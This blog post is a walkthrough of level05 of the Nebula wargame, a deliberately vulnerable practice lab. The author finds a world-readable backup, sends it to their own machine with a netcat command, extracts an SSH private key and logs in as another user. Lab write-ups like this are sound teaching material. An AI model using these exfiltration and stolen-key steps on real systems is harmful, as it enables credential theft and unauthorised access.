Monday, October 29, 2012

exploit-exercises Nebula: level05


This is the write-up for level05 of Nebula wargame. We are told to check the flag05 home directory and look for weak permissions.
level05@nebula:/home/flag05$ ls -la
total 28
drwxr-x---  4 flag05 level05 4096 2011-11-20 21:22 .
drwxr-xr-x 43 root   root    4096 2012-10-14 07:20 ..
drwxr-xr-x  2 flag05 flag05  4096 2011-11-20 20:13 .backup
-rw-r--r--  1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
-rw-r--r--  1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------  2 flag05 flag05  4096 2011-11-20 20:13 .ssh
World readable backup! Checking the directory content, we find a gzipped tar archive.
level05@nebula:/home/flag05$ ls -la .backup/
total 12
drwxr-xr-x 2 flag05 flag05  4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2012-10-14 10:47 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz
We copy that to our local machine using netcat.
kroosec@dojo:~$ nc -l 2000 > /tmp/backup.tgz
level05@nebula:/home/flag05$ nc 192.168.1.51 2000 < backup-19072011.tgz
And extract the archive with tar utility.
kroosec@dojo:~/tmp$ tar zxvf /tmp/backup.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
An ssh key, just there, waiting to be used. We can use that to login with the flag05 user account.
kroosec@dojo:~/test$ ssh flag05@192.168.1.3 -i .ssh/id_rsa
And run getflag!
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

No comments:

Post a Comment